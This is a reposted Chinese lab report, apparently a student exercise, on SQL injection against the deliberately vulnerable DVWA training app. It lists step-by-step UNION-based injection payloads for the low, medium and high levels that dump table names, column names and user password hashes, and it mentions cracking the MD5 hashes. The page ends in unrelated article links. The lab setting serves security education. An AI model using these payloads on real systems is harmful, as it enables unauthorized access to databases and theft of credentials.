当前位置：首页 > news >正文

数据库——SQL注入攻击

news 文章来源：https://blog.csdn.net/weixin_49816179/article/details/135416812 2025/1/12 8:55:56

【实验内容及要求】

一、内容：掌握SQL注入攻击的原理，掌握基本SQL注入攻击的方法，掌握防SQL注入攻击的基本措施。

二、要求：

1. DVWA环境配置

DVWA（Damn Vulnerable Web Application）是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用，旨在为安全专业人员测试自己的专业技能和工具提供合法的环境，帮助web开发者更好的理解web应用安全防范的过程。DVWA共有十个模块，分别是：Brute Force（暴力破解）；Command Injection（命令行注入）；CSRF（跨站请求伪造）；File Inclusion（文件包含）；File Upload（文件上传）；Insecure CAPTCHA （不安全的验证码）；SQL Injection（SQL注入）；SQL Injection（Blind）（SQL盲注）；XSS（Reflected）（反射型跨站脚本）；XSS（Stored）（存储型跨站脚本）。在DVWA 1.9的代码分为四种安全级别：Low，Medium，High，Impossible，可以接触一些PHP代码审计的内容。

本实验要求在下载安装并配置好DVWA实验环境，在DVWA中创建数据库，并进行登录。

2. SQL注入

在DVWA中选择SQL injection，其难度等级分为low、medium、high和impossible。随后根据自身情况进行四种等级的SQL注入实验。

3. 亦可使用sqlmap来进行SQL注入攻击实验。

【实验平台】

【实验步骤】

一、实验环境的搭建

1.将DVWA安装包解压到如图所示相应位置，并备份修改config.inc.php.dist文件配置，然后将安装包解压。

2.更改文件夹权限，并重启apache服务。

3.登录搭建好的网站，更改配置，然后点击Create/Reset Database登录。

二、Low级别的SQL注入

判断注入点。

找闭合，输入1’报错”You have an error in your SQL syntax”；输入1’’不报错，说明闭合是单引号。

输入1’ or ’1234’=’1234，获得所有First name和Surname。

输入1’ or 1=1 order by 1 #，判断有几个字段；

输入1’ or 1=1 order by 2 #；

输入1’ or 1=1 order by 3 #，说明SQL语句查询查询的表的字段数为2。

输入1’ union select 1,2 #，判断回显。

爆库，输入1’ union select 1,database() #，判断使用的数据库。

爆表，输入1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #，获得该数据库的表名。

爆列，输入1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #，获得user表的列名。

输入1’ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #，获得用户名和密码。

密码均为MD5加密，使用CMD5可进行破解。

三、Medium级别SQL注入

由于界面不允许自行输入，使用BurpSuite进行抓包。

更改为id=4 or 1=1 #&Submit=Submit可获得所有用户。

更改为id=4 order by 2 #&Submit=Submit确定列数。

更改为id=4 union select 1,2 #&Submit=Submit，判断回显。

更改为id=4 union select 1,database() #&Submit=Submit，爆库。

更改为id=4 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #&Submit=Submit，爆表。

更改为id=4 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #&Submit=Submit，爆列。（其中0x7573657273为users的十六进制ascii码）

更改为id=4 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #&Submit=Submit，获得用户名和密码。

四、High级别SQL注入

判断注入点。

找闭合，输入1’报错”You have an error in your SQL syntax”；输入1’’不报错，说明闭合是单引号。

输入1’ or 1=1#，获得所有First name和Surname。

输入1’ or 1=1 order by 2 #，判断有几个字段；

输入1’ or 1=1 order by 3 #，说明SQL语句查询查询的表的字段数为2。

输入1’ union select 1,2 #，判断回显。

爆库，输入1’ union select 1,database() #，判断使用的数据库。

爆表，输入1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #，获得该数据库的表名。

爆列，输入1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=’users’ #，获得user表的列名。

输入1’ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #，获得用户名和密码。

五、Impossible级别

无法注入，因为Impossible级别的源码使用正则表达式过滤掉了不合法的字符。

数据库——SQL注入攻击

相关文章：

数据库——SQL注入攻击

【已解决】js定义对象属性是.如何访问

Linux入门攻坚——11、Linux网络属性配置相关知识1

51单片机定时/计数器相关知识点

机器视觉兄弟们，没有项目订单，机器视觉项目行业难题来了

机器人开发--动力系统

51单片机四位数码管计算器 Proteus仿真程序

问题 B: 分牌

3元一平方公里的在线卫星影像

只会用 xxl-job？更强大的新一代分布式任务调度框架来了！

LeetCode-无重复字符的最长子串（3）

【C#】知识点实践序列之Lock简单解决并发引起数据重复问题

NLP基础——TF-IDF

kubernetes（四）

安科瑞变电站综合自动化系统在青岛海洋科技园应用——安科瑞顾烊宇

紫光展锐5G扬帆出海 | 欧洲积极拥抱更多5G选择

Open3D聚类算法

swing快速入门（三十九）进度对话框

Oracle-存储过程

L1-085：试试手气

nginx+keepalived实现七层负载

机器人制作开源方案 | 智能盲道除雪小车

Mypy: 把静态类型检查带给Python

【心得杂记】简单聊聊限制高速面阵相机性能的因素

金蝶Apusic应用服务器 loadTree JNDI注入漏洞

计算机毕业设计基于SpringBoot的公司资产网站的设计与实现 Java实战项目附源码+文档+视频讲解

如何获取时间戳？

Vue页面传值：Props属性与$emit事件的应用介绍

【mars3d】new mars3d.layer.GeoJsonLayer(实现环状面应该怎么传data

Websocket实时更新商品信息

中关村网站建设公司/网络优化培训

星海湾建设管理中心网站/沈阳seo关键词排名

wampserver做动态网站/聚合搜索引擎入口

ug编程培训/苏州seo排名公司

南开天津网站建设/引流推广效果好的app

烽火台网站/企业百度推广怎么收费